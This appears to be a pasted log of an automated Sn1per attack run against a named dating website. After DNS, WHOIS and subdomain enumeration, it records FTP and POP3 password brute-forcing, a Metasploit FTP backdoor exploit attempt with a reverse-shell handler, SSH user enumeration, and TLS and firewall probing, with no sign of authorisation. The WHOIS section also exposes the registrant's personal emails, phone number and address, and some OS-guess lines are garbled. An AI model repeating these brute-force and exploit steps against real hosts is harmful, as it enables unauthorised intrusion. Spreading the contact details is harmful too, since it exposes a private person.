Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [91m + -- --=[Sn1per v2.8 is available to download... To update, type "sniper update" [0m
- [91m ____ [0m
- [91m _________ / _/___ ___ _____[0m
- [91m / ___/ __ \ / // __ \/ _ \/ ___/[0m
- [91m (__ ) / / // // /_/ / __/ / [0m
- [91m /____/_/ /_/___/ .___/\___/_/ [0m
- [91m /_/ [0m
- [0m
- [93m + -- --=[http://crowdshield.com
- [93m + -- --=[sniper v2.7 by 1N3
- [0m
- [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +[0m
- Server: 192.168.1.254
- Address: 192.168.1.254#53
- Non-authoritative answer:
- Name: amourangels.info
- Address: 104.140.246.148
- amourangels.info has address 104.140.246.148
- amourangels.info mail is handled by 0 amourangels.info.
- [92m + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +[0m
- Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
- [+] Target is amourangels.info
- [+] Loading modules.
- [+] Following modules are loaded:
- [x] [1] ping:icmp_ping - ICMP echo discovery module
- [x] [2] ping:tcp_ping - TCP-based ping discovery module
- [x] [3] ping:udp_ping - UDP-based ping discovery module
- [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
- [x] [5] infogather:portscan - TCP and UDP PortScanner
- [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
- [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
- [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
- [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
- [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
- [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
- [x] [12] fingerprint:smb - SMB fingerprinting module
- [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
- [+] 13 modules registered
- [+] Initializing scan engine
- [+] Running scan engine
- [-] ping:tcp_ping module: no closed/open TCP ports known on 104.140.246.148. Module test failed
- [-] ping:udp_ping module: no closed/open UDP ports known on 104.140.246.148. Module test failed
- [-] No distance calculation. 104.140.246.148 appears to be dead or no ports known
- [+] Host: 104.140.246.148 is up (Guess probability: 50%)
- [+] Target: 104.140.246.148 is alive. Round-Trip Time: 1.01964 sec
- [+] Selected safe Round-Trip Time value is: 2.03928 sec
- [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
- [-] fingerprint:smb need either TCP port 139 or 445 to run
- [+] Primary guess:
- [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
- [+] Other guesses:
- [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
- [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
- [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
- [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
- [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
- [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
- [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
- [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
- [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
- [+] Cleaning up scan engine
- [+] Modules deinitialized
- [+] Execution completed.
- [92m + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +[0m
- Domain Name: AMOURANGELS.INFO
- Registry Domain ID: D53470519-LRMS
- Registrar WHOIS Server:
- Registrar URL: http://www.CrazyDomains.com
- Updated Date: 2017-09-20T21:10:20Z
- Creation Date: 2014-09-08T12:30:01Z
- Registry Expiry Date: 2019-09-08T12:30:01Z
- Registrar Registration Expiration Date:
- Registrar: Crazy Domains FZ-LLC
- Registrar IANA ID: 1291
- Registrar Abuse Contact Email:
- Registrar Abuse Contact Phone:
- Reseller:
- Domain Status: ok https://icann.org/epp#ok
- Registry Registrant ID: C154844480-LRMS
- Registrant Name: Kam Media
- Registrant Organization:
- Registrant Street: 20 Boulevard
- Registrant City: Paris
- Registrant State/Province: Paris
- Registrant Postal Code: 75012
- Registrant Country: FR
- Registrant Phone: +33.327723445
- Registrant Phone Ext:
- Registrant Fax:
- Registrant Fax Ext:
- Registrant Email: yanmas@techie.com
- Registry Admin ID: C154844478-LRMS
- Admin Name: Kam Media
- Admin Organization:
- Admin Street: 20 Boulevard
- Admin City: Paris
- Admin State/Province: Paris
- Admin Postal Code: 75012
- Admin Country: FR
- Admin Phone: +33.327723445
- Admin Phone Ext:
- Admin Fax:
- Admin Fax Ext:
- Admin Email: kammedic@hotmail.com
- Registry Tech ID: C154844478-LRMS
- Tech Name: Kam Media
- Tech Organization:
- Tech Street: 20 Boulevard
- Tech City: Paris
- Tech State/Province: Paris
- Tech Postal Code: 75012
- Tech Country: FR
- Tech Phone: +33.327723445
- Tech Phone Ext:
- Tech Fax:
- Tech Fax Ext:
- Tech Email: kammedic@hotmail.com
- Registry Billing ID: C154844478-LRMS
- Billing Name: Kam Media
- Billing Organization:
- Billing Street: 20 Boulevard
- Billing City: Paris
- Billing State/Province: Paris
- Billing Postal Code: 75012
- Billing Country: FR
- Billing Phone: +33.327723445
- Billing Phone Ext:
- Billing Fax:
- Billing Fax Ext:
- Billing Email: kammedic@hotmail.com
- Name Server: NS1.SMILESERVE.COM
- Name Server: NS2.SMILESERVE.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- >>> Last update of WHOIS database: 2017-09-26T21:29:31Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- Access to AFILIAS WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Afilias registry database. The data in this record is provided by Afilias Limited for informational purposes only, and Afilias does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to(a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Afilias reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
- [92m + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +[0m
- *******************************************************************
- * *
- * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
- * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
- * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
- * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
- * *
- * TheHarvester Ver. 2.7 *
- * Coded by Christian Martorella *
- * Edge-Security Research *
- * cmartorella@edge-security.com *
- *******************************************************************
- [-] Searching in Bing:
- [92m + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +[0m
- ; <<>> DiG 9.10.3-P4-Debian <<>> -x amourangels.info
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 62196
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;info.amourangels.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017043180 1800 900 604800 3600
- ;; Query time: 37 msec
- ;; SERVER: 192.168.1.254#53(192.168.1.254)
- ;; WHEN: Tue Sep 26 17:30:33 EDT 2017
- ;; MSG SIZE rcvd: 126
- dnsenum VERSION:1.2.4
- [1;34m
- ----- amourangels.info -----
- [0m[1;31m
- Host's addresses:
- __________________
- [0mamourangels.info. 14234 IN A 104.140.246.148
- [1;31m
- Name Servers:
- ______________
- [0mns2.smileserve.com. 14234 IN A 104.140.246.148
- ns1.smileserve.com. 14234 IN A 104.140.246.148
- [1;31m
- Mail (MX) Servers:
- ___________________
- [0mamourangels.info. 14234 IN A 104.140.246.148
- [1;31m
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- [0m
- Trying Zone Transfer for amourangels.info on ns2.smileserve.com ...
- Trying Zone Transfer for amourangels.info on ns1.smileserve.com ...
- brute force file not specified, bay.
- [92m + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +[0m
- [91m
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|[0m[93m
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [94m[-] Enumerating subdomains now for amourangels.info[0m
- [93m[-] verbosity is enabled, will show the subdomains results in realtime[0m
- [92m[-] Searching now in Baidu..[0m
- [92m[-] Searching now in Yahoo..[0m
- [92m[-] Searching now in Google..[0m
- [92m[-] Searching now in Bing..[0m
- [92m[-] Searching now in Ask..[0m
- [92m[-] Searching now in Netcraft..[0m
- [92m[-] Searching now in DNSdumpster..[0m
- [92m[-] Searching now in Virustotal..[0m
- [92m[-] Searching now in ThreatCrowd..[0m
- [92m[-] Searching now in SSL Certificates..[0m
- [92m[-] Searching now in PassiveDNS..[0m
- [91mSSL Certificates: [0mcpanel.amourangels.info
- [91mSSL Certificates: [0mmail.amourangels.info
- [91mSSL Certificates: [0mwebdisk.amourangels.info
- [91mSSL Certificates: [0mwebmail.amourangels.info
- [91mSSL Certificates: [0mwww.amourangels.info
- [91mVirustotal: [0mwww.amourangels.info
- [93m[-] Saving results to file: [0m[91m/usr/share/sniper/loot/domains/domains-amourangels.info.txt[0m
- [93m[-] Total Unique Subdomains Found: 5[0m
- [92mwww.amourangels.info[0m
- [92mcpanel.amourangels.info[0m
- [92mmail.amourangels.info[0m
- [92mwebdisk.amourangels.info[0m
- [92mwebmail.amourangels.info[0m
- [91m â•”â•â•—╦â•â•—╔╦╗╔â•â•—╦ ╦[0m
- [91m â•‘ ╠╦╠║ â•šâ•â•—â• â•â•£[0m
- [91m â•šâ•â•â•©â•šâ• â•©oâ•šâ•â•â•© â•©[0m
- [91m + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +[0m
- [94m
- *.amourangels.info
- cpanel.amourangels.info
- mail.amourangels.info
- webdisk.amourangels.info
- webmail.amourangels.info
- www.amourangels.info
- [91m [+] Domains saved to: /usr/share/sniper/loot/domains/domains-amourangels.info-full.txt
- [0m
- [92m + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +[0m
- [92m + -- ----------------------------=[Checking Email Security]=----------------- -- +[0m
- [92m + -- ----------------------------=[Pinging host]=---------------------------- -- +[0m
- PING amourangels.info (104.140.246.148) 56(84) bytes of data.
- 64 bytes from ns1.dating-club2007.club (104.140.246.148): icmp_seq=1 ttl=53 time=180 ms
- --- amourangels.info ping statistics ---
- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
- rtt min/avg/max/mdev = 180.089/180.089/180.089/0.000 ms
- [92m + -- ----------------------------=[Running TCP port scan]=------------------- -- +[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-26 17:31 EDT
- Nmap scan report for amourangels.info (104.140.246.148)
- Host is up (2.1s latency).
- rDNS record for 104.140.246.148: ns1.dating-club2007.club
- Not shown: 43 filtered ports, 1 closed port
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 110/tcp open pop3
- 443/tcp open https
- 3306/tcp open mysql
- Nmap done: 1 IP address (1 host up) scanned in 3.23 seconds
- [92m + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +[0m
- [93m + -- --=[Port 21 opened... running tests...[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-26 17:31 EDT
- Nmap scan report for amourangels.info (104.140.246.148)
- Host is up (0.28s latency).
- rDNS record for 104.140.246.148: ns1.dating-club2007.club
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 2397 guesses in 184 seconds, average tps: 13.9
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose
- Running: Linux 2.6.X
- OS CPE: cpe:/o:linux:linux_kernel:2.6.39
- OS details: Linux 2.6.39
- Network Distance: 20 hops
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 272.47 ms 10.13.0.1
- 2 276.93 ms 37.187.24.252
- 3 280.41 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
- 4 ...
- 5 299.36 ms be100-1107.ldn-1-a9.uk.eu (91.121.215.179)
- 6 284.72 ms ge-3-3-0.mpr1.lhr3.uk.above.net (195.66.236.76)
- 7 305.08 ms ae6.mpr3.lhr3.uk.zip.zayo.com (64.125.21.21)
- 8 288.38 ms ae12.mpr2.lhr2.uk.zip.zayo.com (64.125.28.21)
- 9 341.60 ms ae27.cs1.lhr11.uk.eth.zayo.com (64.125.30.236)
- 10 352.35 ms ae5.cs1.lga5.us.eth.zayo.com (64.125.29.126)
- 11 180.89 ms ae27.cr1.lga5.us.zip.zayo.com (64.125.30.251)
- 12 186.10 ms ae1.cr2.lga5.us.zip.zayo.com (64.125.29.38)
- 13 196.49 ms ae10.mpr4.lga7.us.zip.zayo.com (64.125.20.81)
- 14 193.16 ms ae1.mpr2.lga7.us.zip.zayo.com (64.125.20.125)
- 15 189.62 ms 64.124.193.85.IPYX-076763-001-ZYO.above.net (64.124.193.85)
- 16 191.75 ms cs49.cs30.jfk.nyinternet.net (64.147.125.190)
- 17 183.31 ms 66.111.3.30.static.nyinternet.net (66.111.3.30)
- 18 182.30 ms xe-0-1-0.nyc1-100.nyc1.serverhub.com (104.140.200.33)
- 19 180.11 ms exponentiation.approvalbureau.com (104.140.201.114)
- 20 180.26 ms ns1.dating-club2007.club (104.140.246.148)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 198.39 seconds
- [0m[36m[0m
- ______________________________________________________________________________
- | |
- | [1m[32mMETASPLOIT CYBER MISSILE COMMAND V4[0m |
- |______________________________________________________________________________|
- [33m\[0m [33m/[0m [33m/[0m
- [33m\[0m . [33m/[0m [33m/[0m x
- [33m\[0m [33m/[0m [33m/[0m
- [33m\[0m [33m/[0m + [33m/[0m
- [33m\[0m + [33m/[0m [33m/[0m
- * [33m/[0m [33m/[0m
- [33m/[0m . [33m/[0m
- X [33m/[0m [33m/[0m X
- [33m/[0m [31m###[0m
- [33m/[0m [31m# [1m%[0m[31m #[0m
- [33m/[0m [31m###[0m
- . [33m/[0m
- . [33m/[0m . [31m*[0m .
- [33m/[0m
- *
- + [31m*[0m
- [1m^[0m
- #### __ __ __ ####### __ __ __ ####
- #### [33m/[0m [33m\[0m [33m/[0m [33m\[0m [33m/[0m [33m\[0m ########### [33m/[0m [33m\[0m [33m/[0m [33m\[0m [33m/[0m [33m\[0m ####
- ################################################################################
- ################################################################################
- # [1mWAVE 4[0m ######## [1mSCORE 31337[0m ################################## [1mHIGH FFFFFFFF[0m #
- ################################################################################
- https://metasploit.com[0m
- [0m
- =[ [33mmetasploit v4.16.8-dev[0m ]
- + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
- + -- --=[ 498 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- [1m[34m[*][0m Processing /root/.msf4/msfconsole.rc for ERB directives.
- resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.logâ€
- [0m[1m[31m[-][0m Unknown command: “spool.
- [0m[0mRHOST => amourangels.info
- [0mRHOSTS => amourangels.info
- [0m[1m[34m[*][0m amourangels.info:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
- 220-You are user number 1 of 50 allowed.
- 220-Local time is now 17:34. Server port: 21.
- 220-This is a private system - No anonymous login
- 220-IPv6 connections are also welcome on this server.
- 220 You will be disconnected after 15 minutes of inactivity.
- [1m[34m[*][0m amourangels.info:21 - USER: 331 User X:) OK. Password required
- [1m[34m[*][0m Exploit completed, but no session was created.
- [0m[0m[1m[34m[*][0m Started reverse TCP double handler on 10.13.0.222:4444
- [1m[34m[*][0m amourangels.info:21 - Sending Backdoor Command
- [1m[34m[*][0m Exploit completed, but no session was created.
- [0m[93m + -- --=[Port 22 opened... running tests...[0m
- [exception] did not receive banner.
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-26 17:34 EDT
- Nmap scan report for amourangels.info (104.140.246.148)
- Host is up (0.18s latency).
- rDNS record for 104.140.246.148: ns1.dating-club2007.club
- PORT STATE SERVICE VERSION
- 22/tcp filtered ssh
- Too many fingerprints match this host to give specific OS details
- Network Distance: 20 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 110.99 ms 10.13.0.1
- 2 111.63 ms 37.187.24.252
- 3 111.61 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
- 4 113.37 ms 10.95.33.8
- 5 114.60 ms be100-1107.ldn-1-a9.uk.eu (91.121.215.179)
- 6 115.16 ms ge-3-3-0.mpr1.lhr3.uk.above.net (195.66.236.76)
- 7 115.20 ms ae6.mpr3.lhr3.uk.zip.zayo.com (64.125.21.21)
- 8 114.66 ms ae12.mpr2.lhr2.uk.zip.zayo.com (64.125.28.21)
- 9 181.90 ms ae27.cs1.lhr11.uk.eth.zayo.com (64.125.30.236)
- 10 181.46 ms ae5.cs1.lga5.us.eth.zayo.com (64.125.29.126)
- 11 180.87 ms ae27.cr1.lga5.us.zip.zayo.com (64.125.30.251)
- 12 181.68 ms ae1.cr2.lga5.us.zip.zayo.com (64.125.29.38)
- 13 ...
- 14 181.69 ms ae1.mpr2.lga7.us.zip.zayo.com (64.125.20.125)
- 15 180.34 ms 64.124.193.85.IPYX-076763-001-ZYO.above.net (64.124.193.85)
- 16 180.36 ms cs49.cs30.jfk.nyinternet.net (64.147.125.190)
- 17 192.04 ms 66.111.3.30.static.nyinternet.net (66.111.3.30)
- 18 183.32 ms xe-0-1-0.nyc1-100.nyc1.serverhub.com (104.140.200.33)
- 19 179.78 ms exponentiation.approvalbureau.com (104.140.201.114)
- 20 180.73 ms ns1.dating-club2007.club (104.140.246.148)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 13.46 seconds
- [0m[36m[1m[37m
- . .
- .
- [34mdBBBBBBb dBBBP dBBBBBBP dBBBBBb [37m. o
- [34m ' dB' BBP
- dB'dB'dB' dBBP dBP dBP BB
- dB'dB'dB' dBP dBP dBP BB
- dB'dB'dB' dBBBBP dBP dBBBBBBB
- [31mdBBBBBP [34mdBBBBBb dBP dBBBBP dBP dBBBBBBP
- [37m. [36m. [34mdB' dBP dB'.BP
- [36m| [31mdBP[34m dBBBB' dBP dB'.BP dBP dBP
- [36m--o-- [31mdBP[34m dBP dBP dB'.BP dBP dBP
- [36m| [31mdBBBBP[34m dBP dBBBBP dBBBBP dBP dBP[37m
- .
- .
- o [32mTo boldly go where no
- shell has gone before
- [0m
- =[ [33mmetasploit v4.16.8-dev[0m ]
- + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
- + -- --=[ 498 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- [1m[34m[*][0m Processing /root/.msf4/msfconsole.rc for ERB directives.
- resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.logâ€
- [0m[1m[31m[-][0m Unknown command: “spool.
- [0m[0mUSER_FILE => /usr/share/brutex/wordlists/simple-users.txt
- [0mRHOSTS => amourangels.info
- [0m[1m[33m[!][0m RHOST is not a valid option for this module. Did you mean RHOSTS?
- RHOST => amourangels.info
- [0m[1m[34m[*][0m 104.140.246.148:22 - SSH - Checking for false positives
- [1m[31m[-][0m 104.140.246.148:22 - SSH - throws false positive results. Aborting.
- [1m[34m[*][0m Scanned 1 of 1 hosts (100% complete)
- [1m[34m[*][0m Auxiliary module execution completed
- [0m[0m[1m[31m[-][0m Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
- [0m[0m[1m[32m[+][0m 104.140.246.148:22 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
- [1m[34m[*][0m amourangels.info:22 - Scanned 1 of 1 hosts (100% complete)
- [1m[34m[*][0m Auxiliary module execution completed
- [0m[91m + -- --=[Port 23 closed... skipping.[0m
- [91m + -- --=[Port 25 closed... skipping.[0m
- [91m + -- --=[Port 53 closed... skipping.[0m
- [91m + -- --=[Port 79 closed... skipping.[0m
- [91m + -- --=[Port 80 closed... skipping.[0m
- [93m + -- --=[Port 110 opened... running tests...[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-26 17:35 EDT
- Nmap scan report for amourangels.info (104.140.246.148)
- Host is up (0.18s latency).
- rDNS record for 104.140.246.148: ns1.dating-club2007.club
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 185 guesses in 195 seconds, average tps: 0.9
- |_pop3-capabilities: STLS AUTH-RESP-CODE RESP-CODES PIPELINING USER TOP SASL(PLAIN LOGIN) UIDL CAPA
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose
- Running: Linux 2.6.X
- OS CPE: cpe:/o:linux:linux_kernel:2.6.39
- OS details: Linux 2.6.39
- Network Distance: 20 hops
- TRACEROUTE (using port 110/tcp)
- HOP RTT ADDRESS
- 1 522.26 ms 10.13.0.1
- 2 530.92 ms 37.187.24.252
- 3 526.46 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
- 4 ...
- 5 537.91 ms be100-1107.ldn-1-a9.uk.eu (91.121.215.179)
- 6 534.41 ms ge-3-3-0.mpr1.lhr3.uk.above.net (195.66.236.76)
- 7 544.14 ms ae6.mpr3.lhr3.uk.zip.zayo.com (64.125.21.21)
- 8 554.41 ms ae12.mpr2.lhr2.uk.zip.zayo.com (64.125.28.21)
- 9 768.91 ms ae27.cs1.lhr11.uk.eth.zayo.com (64.125.30.236)
- 10 779.44 ms ae5.cs1.lga5.us.eth.zayo.com (64.125.29.126)
- 11 478.92 ms ae27.cr1.lga5.us.zip.zayo.com (64.125.30.251)
- 12 486.24 ms ae1.cr2.lga5.us.zip.zayo.com (64.125.29.38)
- 13 482.45 ms ae10.mpr4.lga7.us.zip.zayo.com (64.125.20.81)
- 14 509.85 ms ae1.mpr2.lga7.us.zip.zayo.com (64.125.20.125)
- 15 509.78 ms 64.124.193.85.IPYX-076763-001-ZYO.above.net (64.124.193.85)
- 16 499.68 ms cs49.cs30.jfk.nyinternet.net (64.147.125.190)
- 17 489.53 ms 66.111.3.30.static.nyinternet.net (66.111.3.30)
- 18 277.03 ms xe-0-1-0.nyc1-100.nyc1.serverhub.com (104.140.200.33)
- 19 266.90 ms exponentiation.approvalbureau.com (104.140.201.114)
- 20 180.03 ms ns1.dating-club2007.club (104.140.246.148)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 208.72 seconds
- [91m + -- --=[Port 111 closed... skipping.[0m
- [91m + -- --=[Port 135 closed... skipping.[0m
- [91m + -- --=[Port 139 closed... skipping.[0m
- [91m + -- --=[Port 161 closed... skipping.[0m
- [91m + -- --=[Port 162 closed... skipping.[0m
- [91m + -- --=[Port 389 closed... skipping.[0m
- [93m + -- --=[Port 443 opened... running tests...[0m
- [92m + -- ----------------------------=[Checking for WAF]=------------------------ -- +[0m
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://amourangels.info
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 13
- [92m + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +[0m
- ____ _ _ _____ _ _
- / ___| | ___ _ _ __| | ___|_ _(_) |
- | | | |/ _ \| | | |/ _` | |_ / _` | | |
- | |___| | (_) | |_| | (_| | _| (_| | | |
- \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
- v1.0.1 by m0rtem
- [17:39:52] Initializing CloudFail - the date is: 26/09/2017
- [17:39:52] Fetching initial information from: amourangels.info...
- [17:39:52] Server IP: 104.140.246.148
- [17:39:52] Testing if amourangels.info is on the Cloudflare network...
- [17:39:52] amourangels.info is not part of the Cloudflare network, quitting...
- [92m + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +[0m
- [1m[34mhttps://amourangels.info[0m [200 OK] [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mHTTPServer[0m[[1m[36mLiteSpeed[0m], [1m[37mIP[0m[[37m104.140.246.148[0m], [1m[37mLiteSpeed[0m, [1m[37mScript[0m[[37mtext/javascript[0m], [1m[37mTitle[0m[[1m[33mAmour Angels[0m], [1m[37mUncommonHeaders[0m[[37malt-svc[0m]
- [92m + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +[0m
- AVAILABLE PLUGINS
- -----------------
- PluginSessionResumption
- PluginOpenSSLCipherSuites
- PluginCertInfo
- PluginHSTS
- PluginHeartbleed
- PluginCompression
- PluginChromeSha1Deprecation
- PluginSessionRenegotiation
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- amourangels.info:443 => 104.140.246.148:443
- SCAN RESULTS FOR AMOURANGELS.INFO:443 - 104.140.246.148:443
- -----------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * Certificate - Content:
- SHA1 Fingerprint: aede924f1243327142e7b33ad2f03010b9390d4c
- Common Name: amourangels.info
- Issuer: cPanel, Inc. Certification Authority
- Serial Number: 488B5892E01C2B2457CD629A118352AD
- Not Before: Sep 21 00:00:00 2017 GMT
- Not After: Dec 20 23:59:59 2017 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['amourangels.info', 'autodiscover.amourangels.info', 'cpanel.amourangels.info', 'mail.amourangels.info', 'webdisk.amourangels.info', 'webmail.amourangels.info', 'www.amourangels.info']}
- * Certificate - Trust:
- Hostname Validation: OK - Subject Alternative Name matches
- Google CA Store (09/2015): OK - Certificate is trusted
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Microsoft CA Store (09/2015): ERROR: timeout - timed out
- Certificate Chain Received: ['amourangels.info', 'cPanel, Inc. Certification Authority', 'COMODO RSA Certification Authority']
- * Certificate - OCSP Stapling:
- OCSP Response Status: successful
- Validation w/ Mozilla's CA Store: OK - Response is trusted
- Responder Id: 7E035A65416BA77E0AE1B89D08EA1D8E1D6AC765
- Cert Status: good
- Cert Serial Number: 488B5892E01C2B2457CD629A118352AD
- This Update: Sep 25 17:45:04 2017 GMT
- Next Update: Oct 2 17:45:04 2017 GMT
- * Session Resumption:
- With Session IDs: PARTIALLY SUPPORTED (4 successful, 0 failed, 1 errors, 5 total attempts). Try --resum_rate.
- ERROR #1: timeout - timed out
- With TLS Session Tickets: NOT SUPPORTED - TLS ticket not assigned.
- SCAN COMPLETED IN 30.28 S
- -------------------------
- Version: [32m1.11.10-static[0m
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- [0m
- Testing SSL server [32mamourangels.info[0m on port [32m443[0m using SNI name [32mamourangels.info[0m
- [1;34mTLS Fallback SCSV:[0m
- Server [31mdoes not[0m support TLS Fallback SCSV
- [1;34mTLS renegotiation:[0m
- [32mSecure[0m session renegotiation supported
- [1;34mTLS Compression:[0m
- Compression [32mdisabled[0m
- [1;34mHeartbleed:[0m
- TLS 1.2 [32mnot vulnerable[0m to heartbleed
- TLS 1.1 [32mnot vulnerable[0m to heartbleed
- TLS 1.0 [32mnot vulnerable[0m to heartbleed
- [1;34mSupported Server Cipher(s):[0m
- [32mPreferred[0m TLSv1.2 [32m128[0m bits [32mECDHE-RSA-AES128-GCM-SHA256 [0m Curve P-256 DHE 256
- Accepted TLSv1.2 [32m256[0m bits [32mECDHE-RSA-AES256-GCM-SHA384 [0m Curve P-256 DHE 256
- Accepted TLSv1.2 [32m128[0m bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 [32m256[0m bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 [32m128[0m bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 [32m256[0m bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
